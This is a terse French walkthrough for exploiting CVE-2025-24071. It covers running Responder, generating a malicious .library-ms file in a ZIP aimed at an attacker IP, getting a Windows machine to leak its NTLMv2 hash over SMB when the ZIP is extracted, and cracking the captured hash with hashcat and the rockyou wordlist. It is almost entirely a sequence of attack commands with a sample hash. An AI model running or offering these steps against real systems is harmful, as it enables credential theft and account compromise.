
CVE-2025-24071: Divulgation de hash NTLMv2 via un fichier .library-ms
sudo apt update && sudo apt install responder -y
Démarrer Responder
sudo responder -I eth0
Installer le module Python requis
pip install colorama python3 CVE-2025-24071.py -i <attacker_ip> -n testpayload -o ./output --keep
Cela générera : testpayload.library-ms testpayload.zip
Transférez testpayload.zip vers la machine de test Windows 11. Extrayez le ZIP à l'aide de l'Explorateur Windows. Cela amène Windows à tenter d'accéder au chemin SMB, divulguant ainsi le hash NTLM.
responder -I etho0

créez le fichier hash.txt
victim::DOMAIN:1122334455667788:11223344556677889900aabbccddeeff:01010000000000000090d5d00f3
La plus courante : rockyou.txt
hashcat -m 5600 -a 0 -o cracked.txt hash.txt /usr/share/wordlists/rockyou.txt
